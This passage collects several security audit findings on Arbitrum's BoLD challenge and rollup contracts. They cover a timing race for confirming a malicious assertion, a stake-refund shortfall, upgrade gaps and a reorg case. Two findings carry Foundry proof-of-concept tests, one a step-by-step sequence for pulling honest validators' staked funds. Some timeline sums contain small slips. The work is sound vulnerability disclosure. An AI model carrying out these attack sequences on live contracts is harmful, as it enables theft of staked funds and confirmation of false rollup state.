The honest party notices at 604000 + 48 + 100 = 604148 that the total unrivaled time of valid assertion claim is now 604700 + (604148 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 100 = 604148.

The evil party's confirmation tx is mined at 604000 + 48 + 100 + 24 = 604172. This tx will be successful because the time this tx is mined, the total unrivaled time of malicious assertion claim is increased by 24 which makes the total equal to 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx will not be successful at 604800 + 48 + 100 + 48 = 604196, because its rival is already confirmed.

Example 2 (where tA > tH):

 -- 604000 -- 604005 ------- 604029 -------- 604048 ------ 604053 -------- 604077 ------------------ 604101 ----> t

 ---- t1 ---- t1 + tH ---- t1 + tH + tA ---- t1 + k ---- t1 + k + tH ---- t1 + tH + tA + k ---- t1 + k + tH + k ----> t

    Honest    Evil          Evil            Honest            Honest              Evil                  Honest
    Create    Rival &       Confirm         Create            Confirm             Confirm               Confirm
              Create             
    Send      Send          Send            Mined             Send                Mined                 Mined

                                                              Evil
                                                              Rival &
                                                              Create
                                                              Mined  
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 5
  • tA: 24
  • k: 48

Honest party creates an edge at time 604000. The total unrivaled time of the valid assertion claim is 604795, so if the evil party makes delay of 5 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if honest party makes delay of 24 seconds, the evil party can confirm the malicious assertion claim.

Evil party sends a tx at 604000 + 5 = 604005 to rival the honest party's edge (which is not still mined) and also creates a new edge. Then the evil party sends a tx at 604000 + 5 + 24 = 604029 to confirm the malicious assertion claim.

The honest party's edge creation is mined at 604000 + 48 = 604048.

The honest party notices at 604000 + 48 + 5 = 604053 that the total unrivaled time of valid assertion claim is now 604795 + (604053 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx at 604000 + 48 + 5 = 604053 to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 5 = 604053.

The evil party's confirmation tx is mined at 604000 + 48 + 5 + 24 = 604077. This tx will be successful because the time this tx is mined, the total unrivaled time of malicious assertion claim is increased by 24 which makes the total equal to 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx will not be successful at 604800 + 48 + 5 + 48 = 604101, because its rival is already confirmed.

Example 3 (where tA < tH & evil party is not precise):

So far, I was assuming that the evil party's rival and new edge creation is mined exactly at the time the honest party's confirmation tx is sent. This was just for simplicity, and it is not necessary. So, here I assume that the evil party has x seconds delay where x <= k.

 -- 604000 -- 604048 ------ 604112 ---------- 604136 ------------- 604148 ---------- 604160 ------------- 604184 --------------- 604196 ----> t

 ---- t1 ---- t1 + k ---- t1 + tH + x ---- t1 + tH + tA + x ---- t1 + k + tH -- t1 + tH + x + k -- t1 + tH + tA + x + k --- t1 + k + tH + k ----> t

    Honest    Honest       Evil             Evil                    Honest          Evil               Evil                  Honest
    Create    Create       Rival &          Confirm                 Confirm         Rival &            Confirm               Confirm
                           Create                                                   Create
    Send      Mined        Send             Send                    Send            Mined              Mined                 Mined
  • challengePeriodBlocksInTime = 604800 (7 days)
  • tH: 100
  • tA: 24
  • k: 48
  • x: 12

Honest party creates an edge at time 604000, and it is mined at 604000 + 48 = 604048. The total unrivaled time of the valid assertion claim is 604700, so if the evil party makes delay of 100 seconds, the honest party can confirm the valid assertion claim. Moreover, the total unrivaled time of the malicious assertion claim is 604776, so if honest party makes delay of 24 seconds, the evil party can confirm the malicious assertion claim.

Evil party sends a tx at 604000 + 100 + 12 = 604112 to rival the honest party's edge and also creates a new edge. Then the evil party sends a tx at 604000 + 100 + 24 + 12 = 604136 to confirm the malicious assertion claim.

The honest party notices at 604000 + 48 + 100 = 604148 that the total unrivaled time of valid assertion claim is now 604700 + (604148 - (604000 + 48)) = 604800 which is equal to challengePeriodBlocksInTime. So, he sends the tx to confirm the valid assertion claim.

The evil party's rival and new edge creation tx is mined at 604000 + 48 + 100 + 12 = 604160.

The evil party's confirmation tx is mined at 604000 + 48 + 100 + 24 + 12 = 604184. This tx will be successful because the time this tx is mined, the total unrivaled time of malicious assertion claim is increased by 24 which makes the total equal to 604800 = challengePeriodBlocksInTime. So, the malicious assertion claim is confirmed, and the evil party wins.

The honest party's confirmation tx will not be successful at 604800 + 48 + 100 + 48 = 604196, because its rival is already confirmed.

The root cause of this issue is that there is a delay between the time the honest party sends the confirmation tx and the time it is mined. If the evil party could engineer the time so that the confirmation of malicious assertion claim is mined between these two times, the evil party will always win the scenarios where tA <= k. In other words, the required total unrivaled time of malicious assertion claim to be confirmed should be equal or less than the delay between sending a tx and being mined.

In summary, when the honest party notices that total unrivaled time of valid assertion claim is meeting the threshold, he sends the confirmation tx. There is some delay to have this tx mined. If the evil party during this time delay could mine his confirmation of malicious assertion claim, he is the winner.

Some important notes:

  • The attack is possible because when the honest party's confirmation tx is mined, the total unrivaled time of valid assertion claim is equal to challengePeriodBlocksInTime + k. In other words, k is the extra time that honest party wastes. And this extra waste of time is the time window that the evil party can confirm the malicious assertion claim. That is why the only condition for this attack is to have tA <= k.
  • It is maybe assumed that if the honest party sends the confirmation tx k seconds earlier, it will be protected against this attack. Because, it will be mined k seconds earlier, so that the evil party's confirmation will not be mined earlier than the honest party's. But, this is not true, because the honest party sends the confirmation tx as soon as he notices that the total unrivaled time of valid assertion claim is equal to challengePeriodBlocksInTime. In other words, if the honest party sends the confirmation tx earlier (when the total unrivaled time of valid assertion claim is not equal to challengePeriodBlocksInTime), it is not guaranteed that during the time this tx is being mined the evil party does not rival the edge and stops the timer. So, it is reasonable that the honest party be patient until he notices that total unrivaled time of the valid assertion claim is equal to challengePeriodBlocksInTime and then sends the confirmation tx.
  • There is maybe a question that why when the evil party rivals the honest party's edge and creates a new edge, the honest party does not rival this newly created edge. The answer is that the evil party's rival and new edge creation is mined at t1 + k + tH or after (explained in example 3). In other words, it is mined after the honest party's confirmation tx is sent. Even if the honest party rivals this newly created edge, it will be mined after k seconds which is too late, because it will be mined after the evil party's confirmation tx is mined.
  • For simplicity I was using the time instead of block number. Even if using the block number, this attack is still valid. It is just needed to divide each time by 12 (assuming each block is mined every 12 seconds on Ethereum).
  • This attack is possible because the evil party knows how the honest party reacts. That is why the evil party sends the confirmation tx at the time that the total unrivaled time of malicious assertion claim is not eqaul to challengePeriodBlocksInTime (so he is not eligible to confirm it). But, the evil party knows that when this tx is mined the total unrivaled time of malicious assertion claim is eqaul to challengePeriodBlocksInTime. Becuase, he knows that the honest party will react to an edge when it is mined. So, the evil party sends the tx of confirmation shortly (tA second) after the rival and new edge creation tx.
  • So far I was showing the cases that both valid and malicious assertion claims are very close to be confirmed by time, just to demonstrate that in case the game is very challenging, the evil party is the winner with higher possibility. Looking at examples shows that the evil party's confirmation tx is sent always before the evil party's rival and new edge creation tx is mined. So, the honest party reacts to this newly created edge at the time it is mined. Even if the honest party immediately rivals after noticing this tx is mined, it will be mined k seconds later, and accumulating k seconds in favor of the evil party. Since the evil party's confirmation tx is sent before the evil party's rival and new edge creation tx, the evil party's confirmation tx is mined earlier than the honest user's reaction.

Tools Used

Recommended Mitigation Steps

It should be enforced that the confirmation tx should not be sent before the latest edge creation tx related to the assertion claim is mined.

uint256 public kInBlocks = 48 / 12; // The delay between sending a tx and being mined in blocks
function confirmEdgeByTime(bytes32 edgeId, AssertionStateData calldata claimStateData) public {
    //....
    ChallengeEdge storage topEdge = store.get(edgeId);

    // this is the block in which the last child edge creation related to this edge id is mined.
    uint lastCreatedEdgeInBlock = topEdge.latestCreatedEdge.createdAtBlock; 

    require(block.number - lastCreatedEdgeInBlock >= kInBlocks, "the confirmation is sent earlier than the edge creation is mined");
}

Assessed type

Context

An error in the accounting of stake refunds could result in insolvency

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/EdgeChallengeManager.sol#L433-L434

Vulnerability details

Impact

Malicious parties who created edge challanges can not get refund if the the edge was deemed to be a loser. The protocol sends all rivals of a layer zero edge to excessStakeReceiver. However, if a new challange manager was deployed during the dispute game, and a new edge was created after, it could cause an error in the accounting of stake refunds resulting in insolvency. Therefore, one or more honest parties won't get their original stake back.

Note: stakes here refer to staking on layer zero edges upon creation.

Proof of Concept

Here is a scenario as an example to illustrate the issue:

Assume we have Bob, Alice, Mario as participants.
Assume in the edge challenge manager contract, we have 5 WETH balance that's allocated for honest participants for refunding their stakes on edge challanges.

  • Contract balance => 5 WETH
  • Stake amount at the moment is 1 WETH.
  • Bob creates a edge challange for an incorrect assertion.
  • Since Bob is the first one, 1 WETH will be transferred to the edge challenge manager contract
	address receiver = edgeAdded.hasRival ? excessStakeReceiver : address(this);
	st.safeTransferFrom(msg.sender, receiver, sa);

EdgeChallengeManager.sol#L433-L434

  • Contract balance => 6 WETH
  • Alice creates a rival edge (for another incorrect assertion).
  • 1 WETH will be transferred to excessStakeReceiver
  • a new edge challenge manager is deployed changing the stake amount to 2 WETH
  • Note that, the dispute game is still on-going (we have a window of a challange period)
  • Mario creates a rival edge (for the correct assertion) utilizing BoLD to protect the chain.
  • 2 WETH from Mario transferred to the edge.
  • The game finished, Mario won.
  • Mario calls refundStake to retrieve their stake back (2 WETH)
  • Mario receives 2 WETH
  • Contract balance => 4 WETH

As noticed, the contract doesn't have enough balance to cover the refunds for all honest participants. Thus, one or more honest participants won't get their refund back.

Tools Used

Manual analysis

Recommended Mitigation Steps

Instead of sending all stakes provided after the first one to an excess stake receiver, Accumulate the stakes for all rival edges in the contract. Then on refundStake , refund the winner and send the remaining to excess stake receiver.

Assessed type

Other

The adversary validators steal the staked funds in `RollupUserLogic.sol`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L223-L226

Vulnerability details

Description

All the validators that have lost a challenge in the past can steal funds from The honest validators in RollupUserLogic.sol
Here are quick 7 steps POC (check below for coded POC):
Note: Alice and Bob are playing under the same entity.

1- The adversary validators Bob lose a challenge.
Bob loses 10 Wei here.

2- The honest validator creates the next assertion.

3- The admin call setBaseStake() to decrease the baseStake state variable.
e.g: from 10 Wei to 8 Wei.

4- Alice invoke newStakeOnNewAssertion() to create the first child of Bob assertion
Alice stake (technically it's a loss at this point) 10 Wei for this.
However, the requiredStake in Alice's assertion configHash is only 8 Wei (Check it here).

5- Bob trigger reduceDeposit() to reduce his amount staked to only 8 Wei.

6- Now, Bob invoke stakeOnNewAssertion() to create the first child of Alice assertion.

7- Alice invoke returnOldDeposit() to withdraw her 10 Wei and Bob withdraw his 2 Wei by calling withdrawStakerFunds().

Deep dive

Key points:

  • In the RollupUserLogic.sol, When an assertion has two children or more, The protocol only keeps 1 stake per challenge, so the loser stakes are already sent to the loserStakeEscrow(check here). So, the only funds will be available in RollupUserLogic is from the honest validators and they can withdraw the funds when are not active staker.

  • In the RollupCore system, it is possible to create multiple assertions with only one stack. It uses a structure where assertions are linked, and each new assertion is created based on the state of the previous one. This is why when an adversary validator loses a challenge his values in _stakerMap[stakerAddress] are not updated.

  • The setBaseStake() function in the RollupAdminLogic.sol contract is used to update the baseStake state variable, which is required for posting a claim (aka an assertion) in the RollupUserLogic.sol contract. This function is part of the administrative controls of the rollup system, allowing the rollup administrator to adjust the staking requirements as needed.

  • The baseStake state variable is used in createNewAssertion() this values will be defined how much the next assertion should stake (the next assertion should get created based previous one).

Step by step:

When Bob loses the challenge to the honest validator he also loses the 10 wei (as a stake amount). However, His values in _stakerMap[stakerAddress] don’t get updated this is intended by the protocol because the loser’s stake would not be able to be withdrawn unless someone else put down a stake to unlock the loser's stake, but that someone’s stake would be locked, effectively he is paying the original loser.

On the other hand, the honest validator will keep up his good work by posting the next and the next assertions.

Until one day the rollup owner decides to decrease the baseStake state variable (More on how the logic handle it HERE)

Note: At this point, any validator who has lost a challenge in the past can do the same as Bob will do.

Back to Bob, His assertion state is still Pending and let's call it the assertion X
Alice will invoke newStakeOnNewAssertion() to create the first child of Bob assertion X
and let's call Alice's assertion Y. Of course, she will stake 10 Wei and Bob will be able to withdraw his 10 Wei (But Bob will not withdraw his 10 Wei now)

The reason why we need to create assertion Y. is because it will use the new value of baseStake in the configHash of assertion Y (this will help the adversary validator to unlock Alice's stake).

Now, Bob will trigger reduceDeposit() to reduce his amount staked to only 8 Wei (This 8 Wei he will use it to unlock 10 Wei of Alice). The other 2 Wei are unstacked and he can withdraw them anytime.

Bob will call stakeOnNewAssertion() to create the first child of Alice assertion Y
BUT, this time he will stake only 8 Wei (Why? Check this again)

As a result of this:
1- Alice will withdraw her 10 Wei
2- Bob will withdraw the stolen funds which is 2 Wei in this POC
Note: The 2 Wei are from the honest validators staked funds.

Impact

Any validator that has lost a challenge in the past can steal part of the honest validator's staked funds.

Proof of Concept

Foundry PoC:

Please copy the following POC in Rollup.t.sol

    function testSuccessSetBaseStake() public {
        vm.prank(upgradeExecutorAddr);
        adminRollup.setBaseStake(8);
    }
    function testPOC_SuccessConfirmEdgeByTime() public returns (SuccessCreateChallengeData memory) {
        SuccessCreateChallengeData memory data = testSuccessCreateChallenge();

        vm.roll(userRollup.getAssertion(genesisHash).firstChildBlock + CONFIRM_PERIOD_BLOCKS + 1);
        vm.warp(block.timestamp + CONFIRM_PERIOD_BLOCKS * 15);
        userRollup.challengeManager().confirmEdgeByTime(
            data.e1Id,
            AssertionStateData(
                data.afterState1,
                genesisHash,
                userRollup.bridge().sequencerInboxAccs(0)
            )
        );
        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(0);
        vm.roll(block.number + userRollup.challengeGracePeriodBlocks());
        vm.prank(validator1);
        userRollup.confirmAssertion(
            data.assertionHash,
            genesisHash,
            data.afterState1,
            data.e1Id,
            ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: firstState.globalState.u64Vals[0]
            }),
            inboxAcc
        );
        return data;
    }

    function readStakerMap(
        address addr
    )
        public
        returns (
            uint256 amountStaked,
            bytes32 latestStakedAssertion,
            uint64 index,
            bool isStaked,
            address withdrawalAddress
        )
    {
        return (userRollup._stakerMap(addr));
    }

    function testRun_Me_POC() public {
        /*****************
         *****Step -1-*****
         *****************/
        SuccessCreateChallengeData memory data = testPOC_SuccessConfirmEdgeByTime();
        /*@audit-info 
        - `validator1` is the honest validator
        - `validator2` is the adversary validator (aka: Bob)
        - `validator3` is the adversary validator (aka: Alice)
        at this point:
        Bob lose a challenge and his 10 wei (which is the value of the constant `BASE_STAKE`)*/

        /*****************
         *****Step -2-*****
         *****************/
        //Set-up
        uint256 prevInboxCount = data.newInboxCount;
        bytes32 prevHash = userRollup.latestConfirmed();
        AssertionState memory beforeState;
        beforeState = data.afterState1;

        AssertionState memory afterState;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = uint64(prevInboxCount);

        bytes32 inboxAcc = userRollup.bridge().sequencerInboxAccs(1); // 1 because we moved the position within message
        bytes32 expectedAssertionHash = RollupLib.assertionHash({
            parentAssertionHash: prevHash,
            afterState: afterState,
            inboxAcc: inboxAcc
        });

        bytes32 prevInboxAcc = userRollup.bridge().sequencerInboxAccs(0);

        //The honest validator creats the next assertion
        vm.prank(validator1);
        userRollup.stakeOnNewAssertion({
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash
        });

        /*****************
         *****Step -3-*****
         *****************/
        //The admin call setBaseStake() to decrease the `baseStake` state variable from 10 wei to 8 wei
        testSuccessSetBaseStake();

        /*****************
         *****Step -4-*****
         *****************/
        //Set-up
        beforeState = data.afterState2;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.u64Vals[0] = uint64(prevInboxCount);

        // `Alice` the adversary validator creats the next assertion
        vm.prank(validator3);
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: genesisHash,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: bytes32(0),
            withdrawalAddress: validator3Withdrawal
        });

        //nb:You can check. the adversary validator `Bob` is able to withdraw his 10 wei
        /*vm.prank(validator2);
        userRollup.returnOldDeposit();*/

        /*****************
         *****Step -5-*****
         *****************/
        //`Bob` trigger `reduceDeposit()` to reduce his staked amount only to 8 wei
        vm.prank(validator2);
        userRollup.reduceDeposit(8);

        /*****************
         *****Step -6-*****
         *****************/
        //`Bob` invoke stakeOnNewAssertion() to create the first child of Alice assertion
        //Note: `Bob` will lock only 8 wei this time

        //Set-up
        (, bytes32 latestStakedAssertion, , , ) = readStakerMap(validator2);
        uint64 newInboxCount = uint64(_createNewBatch());

        beforeState = afterState;
        prevInboxAcc = userRollup.bridge().sequencerInboxAccs(1);

        AssertionState memory afterStatePOC;
        afterStatePOC.machineStatus = MachineStatus.FINISHED;
        afterStatePOC.globalState.bytes32Vals[0] = keccak256(
            abi.encodePacked(FIRST_ASSERTION_BLOCKHASH)
        ); // blockhash
        afterStatePOC.globalState.bytes32Vals[1] = keccak256(
            abi.encodePacked(FIRST_ASSERTION_SENDROOT)
        ); // sendroot
        afterStatePOC.globalState.u64Vals[0] = newInboxCount; // inbox count
        afterStatePOC.globalState.u64Vals[1] = 0; // pos in msg

        vm.roll(block.number + 75);

        vm.prank(validator2);

        userRollup.stakeOnNewAssertion({
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: prevInboxAcc,
                    prevPrevAssertionHash: latestStakedAssertion,
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: 8,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterStatePOC.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterStatePOC
            }),
            expectedAssertionHash: bytes32(0)
        });

        /*****************
         *****Step -7-*****
         *****************/
        //Alice withdraw 10 wei
        vm.prank(validator3);
        userRollup.returnOldDeposit();

        vm.prank(validator3Withdrawal);
        uint amountWithdrawn = userRollup.withdrawStakerFunds();
        assertEq(amountWithdrawn, 10);

        //Bob withdraw 2 wei
        vm.prank(validator2Withdrawal);
        amountWithdrawn = userRollup.withdrawStakerFunds();
        assertEq(amountWithdrawn, 2);
    }

2- forge test --match-test testRun_Me_POC

Tools Used

Docs Wolf - Manual Review

Recommended Mitigation Steps

Make sure that any adversary validator is not able to come back and recover his funds by triggering RollupCore.sol#deleteStaker()
However, I can't find a way with the current tracking system to find and delete the pending assertions after calling RollupUserLogic.sol#confirmAssertion()

Assessed type

Invalid Validation

Upgrades to EdgeChallengeManager using setChallengeManager can allow to confirm bad assertion

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L326-L329

Vulnerability details

Description

The report is related to my other report related to EdgeChallengeManager (a.k.a. ECM) upgrade (Upgrades to EdgeChallengeManager changing staking requirement can cause funds loss), so you should read it first before continuing as I will not re-explain what was explained in my previous report to save both the reader and myself time.

This report is exploring the impact of upgrading the EdgeChallengeManager.sol entirely (using RollupAdminLogic::setChallengeManager) and the impact on the BoLD system overall. This is a new design, while before the stakeToken could be replaced (using RollupAdminLogic::setStakeToken), which is now being replaced by the fact that instead you replace the ECM as a whole (which might have a another stakeToken).

While the golang BoLD code is out-of-scope, since there is a key implication with how EdgeChallengeManager.sol and RollupAdminLogic.sol evolve in case of upgrade, I believe this should be considered in scope as involving directly those contract life cycle and seems to warrant High severity.

Validators are connected to a single instance ECM when they start. This can be seen at multiple places in the code but more importantly when creating the AssertionManager Manager::NewManager, and same for the assertion chain which internally use the same single ECM.

The validators will keep pooling the blockchain and syncing any new assertion created, and create challenge when it detect that an assertion is wrong, this is done inside sync.go. In case an ECM upgrade occurs, the following condition will trigger once the new ECM instance is officialized (RollupAdminLogic::setChallengeManager), which will have no real impact beside a logging warning.

	if args.canonicalParent.ChallengeManager != m.challengeManagerAddr {
		srvlog.Warn("Posted rival assertion, but could not challenge as challenge manager address did not match, "+
			"start a new server with the right challenge manager address", log.Ctx{
			"correctAssertion":                  postedRival.AssertionHash,
			"evilAssertion":                     args.invalidAssertion.AssertionHash,
			"expectedChallengeManagerAddress":   args.canonicalParent.ChallengeManager,
			"configuredChallengeManagerAddress": m.challengeManagerAddr,
		})
		return nil, nil
	}

We can see that the validator supporting BoLD will use the following code most likely (well similar, as this is from test, but would pull the ECM from the Rollup too) to pull the new ECM instance. Even if you could specify manually the ECM address, I don't think the current integration would be supporting a validator running multiple instances of the BoLD protocol, it doesn't seem to have been built for that at least out-of-the-box (but I could be wrong).

	challengeManagerAddr, err := assertionChainBinding.RollupUserLogicCaller.ChallengeManager(
		util.GetSafeCallOpts(&bind.CallOpts{Context: ctx}),
	)

Impacts

  1. (front-run) If all honest validator decides to restart as soon as the warning is being seen, that would left the old ECM with unfinished challenge(s), which could means some challenge stucks and/or bad assertion can be confirmed. For example, it could allow an evil validator to front-run the setChallengeManager call, and post a bad assertion against the old ECM which will never be challenged, and confirmed later on by the evil validator.
  2. (back-run) If all honest validator doesn't restart for a long enough period of time (enough time to have the assertion confirmed by time, so 6.36 days), a bad assertion could be confirmed on the new ECM instance by an evil validator, which would have submitted the new assertion as soon as detected the setChallengeManager call.

Proof of Concept

This is showcasing Impact 2 which seems to have higher probability to happen in production. We have 3 actors in play: Admin, Honest and Evil validator.

  1. Admin deploy ECM contract. Everything run smootly for days.
  2. Admin decides to upgrade the contract changing the staking requirement, which require a full upgrade and call setChallengeManager.
  3. An Evil validator is monitoring the mempool and see the incoming setChallengeManager transaction. He decide to back-run it and post a new bad assertion against the new ECM instance.
  4. The Honest validator is running smootly, while it will detects this assertion is bad and require a challenge, it will not chanllenge it as it belong to another ECM instance, but will post a warning in logs but no other action will be done.
  5. After 6.36 days (a.k.a. current challengePeriodBlocks value), the Evil validator will be able to confirm the assertion, as it will not have been challenged (Honest will still be challenging only against the old ECM as not restarted). Furthermore, the challengeGracePeriodBlocks will not be considered as again this assertion would not have been challenged.
        if (prevAssertion.secondChildBlock > 0) {
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Recommended Mitigation Steps

Mitigation from the BoLD implementation - Approach One

  1. Have the validator BoLD implementation to listen OwnerFunctionCalled event and when id 32 is detected (setChallengeManager upgrade), instanciate another instance of the BoLD implementation. Yes that would means a validator can run multiple instances of BoLD implementation at the sametime, if this is not supported, that would need to be added.
    function setChallengeManager(address _challengeManager) external {
        challengeManager = IEdgeChallengeManager(_challengeManager);
        emit OwnerFunctionCalled(32);
    }
  1. Keep track which challenges are in progress, and once all assertion on the old ECM are confirmed, the validator could kill this BoLD instance.
  2. This tracking would also allow more robustness as if validator restart (crash or maintenance) after an upgrade, it should spawn an instance also (as he would anyway spawn an instance for the current ECM) against the old ECM in order to complete those challenge(s).

Mitigation from the BoLD implementation - Approach Two

Another complete different option would be to keep a single instance of the BoLD protocol running in the validator, but refactor it such that it is not bounded to a single ECM, but rather interact with the correcponding ECM based from the where the assertion have been created against.

Mitigation from the ECM

Another option would be to allow only normal upgrade and track the staking requirement inside the Challenge struct as suggested in my other report, which would remove the need todo full upgrade which change also the proxy and create this whole issue.

Assessed type

Upgradable

adversary can win the dispute game in the re-org event

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L160-L201
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L411-L439

Vulnerability details

Impact

Malicious parties can the dispute game in the re-org event .

Proof of Concept

function add(EdgeStore storage store, ChallengeEdge memory edge) internal returns (EdgeAddedData memory) {
 ..../
   if (firstRival == 0) {
        store.firstRivals[mutualId] = UNRIVALED;
    } else if (firstRival == UNRIVALED) {
        store.firstRivals[mutualId] = eId;
    } else {

    }
   ....../ 
   }

When creating layer zero edge or bisection child edges , all of those edges will be added to edge store and their first rival will be set .If the edge is added for first time and there is no rival for that mutual ID , first rival will set to UNRIVALED .Otherwise first rival will set to that edge ID .

POC
1.Malicious party ALICE create layer zero edge id 1

2.first rival of that mutual ID will be set UNRIVALED

3.honest party BOB create layer zero edge id 2 with same mutual id to edge 1

4.first rival of that mutual ID will be set edge id 2

5.honest party will bisect the edge and will create two child edges and waiting for alice 's turn to create rivals for his children edges.

6.Unfornately , re-org event happen at block where BOB create layer zero
edge id 2

7.first rival of mutual ID for both layer zero edge id 1 & 2 will be set UNRIVALED again

8.BOB didn't know that re-org and waiting for children edges rivals from malicious party .

9.Malicious party alice 's UNRIVALED time will be bigger than BOB because she's been UNRIVALED since she created layer zero edge 1 .

10.Malicious ALICE can front run call confirm edge by time ahead of BOB .

ADD ResetFirstRival to EdgeChallengeManager.sol

    function ResetFirstRival(bytes32 mutualId) public {
    store.firstRivals[mutualId] = keccak256(abi.encodePacked("UNRIVALED"));
}

ADD test to EdgeChallengeManager.t.sol

    function testReorg() public returns (EdgeInitData memory, bytes32) {
    (EdgeInitData memory ei, bytes32[] memory states1,, bytes32 edge1Id) = testCanCreateEdgeWithStake();

    _safeVmRoll(block.number + NUM_BLOCK_UNRIVALED);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), NUM_BLOCK_UNRIVALED, "Edge1 timer");
    
        bytes32[] memory states2 = a2RandomStates;
        bytes32[] memory exp2 = a2RandomStatesExp;
        bytes32 edge2Id = ei.challengeManager.createLayerZeroEdge(
            CreateEdgeArgs({
                level: 0,
                endHistoryRoot: MerkleTreeLib.root(exp2),
                endHeight: height1,
                claimId: ei.a2,
                prefixProof: abi.encode(
                    ProofUtils.expansionFromLeaves(states2, 0, 1),
                    ProofUtils.generatePrefixProof(1, ArrayUtilsLib.slice(states2, 1, states2.length))
                ),
                proof: abi.encode(
                    ProofUtils.generateInclusionProof(ProofUtils.rehashed(states2), states2.length - 1),
                    genesisStateData,
                    ei.a2Data
                )
            })
        );

      

        _safeVmRoll(block.number + NUM_BLOCK_WAIT);
        assertEq(ei.challengeManager.timeUnrivaled(edge1Id), NUM_BLOCK_UNRIVALED, "Edge1 timer");
        assertEq(ei.challengeManager.timeUnrivaled(edge2Id), 0, "Edge2 timer");
    

    BisectionChildren memory children = bisect(ei.challengeManager, edge1Id, states1, 16, states1.length - 1);

    _safeVmRoll(block.number + 3);


    BisectionChildren memory children2 = bisect(ei.challengeManager, edge2Id, states2, 16, states2.length - 1);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 2, "Edge1 timer");

    _safeVmRoll(block.number + 3);
    
    //*@audit-info ------->>> the last bisection is done by edge 2 
    BisectionChildren memory children3 = bisect(ei.challengeManager, children2.lowerChildId, states2, 8, 16);

    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 2, "Edge1 timer");

    ChallengeEdge memory edge = ei.challengeManager.getEdge(edge1Id);

    bytes32 mutualId = edge.mutualIdMem();
    
    //*@audit-info ------>>> re-org happen here 
    ei.challengeManager.ResetFirstRival(mutualId);
    
    assertEq(ei.challengeManager.timeUnrivaled(edge1Id), 11, "Edge1 timer");


    _safeVmRoll(block.number + challengePeriodBlock );

    ei.challengeManager.updateTimerCacheByChildren(children3.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children3.upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(children2.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children2.upperChildId);
    ei.challengeManager.updateTimerCacheByChildren(children.lowerChildId);
    ei.challengeManager.updateTimerCacheByChildren(children.upperChildId);
    ei.challengeManager.confirmEdgeByTime(edge1Id, ei.a1Data);
    vm.expectRevert(abi.encodeWithSelector(RivalEdgeConfirmed.selector, edge2Id, edge1Id));
    ei.challengeManager.confirmEdgeByTime(edge2Id, ei.a2Data);

